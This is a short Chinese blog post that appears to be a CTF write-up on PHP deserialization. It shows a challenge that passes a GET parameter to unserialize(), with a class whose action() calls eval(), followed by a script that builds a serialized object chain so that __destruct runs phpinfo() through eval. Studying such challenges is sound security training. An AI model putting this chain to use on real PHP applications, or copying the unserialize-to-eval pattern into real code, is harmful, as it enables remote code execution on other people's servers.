当前位置：网站首页>PHP序列化：eval

PHP序列化：eval

2022-07-31 12:40:00 【小龙在山东】

题目

<?php
highlight_file(__FILE__);
class lemon{
    
    protected $ClassObj;
    function __construct(){
    
        $this->ClassObj = new normal();
    }
    function __destruct(){
    
        $this->ClassObj->action();
    }
}
class normal{
    
    function action(){
    
        echo "hello";
    }
}
class evil{
    
    private $data;
    function action(){
    
        eval($this->data);
    }
}
unserialize($_GET['d']);

?>

解题思路：通过传入d参数，参数是序列化后的字符串，用来调用魔术方法__destruct，然后调用evil的action，进而可以执行eval。

wp

生成序列化字符串：

<?php
class lemon{
    
	protected $ClassObj;
	function __construct(){
    
		$this->ClassObj = new evil();
	}
}
class evil{
    
	private $data = "phpinfo();";
}

$test = new lemon();

echo urlencode(serialize($test));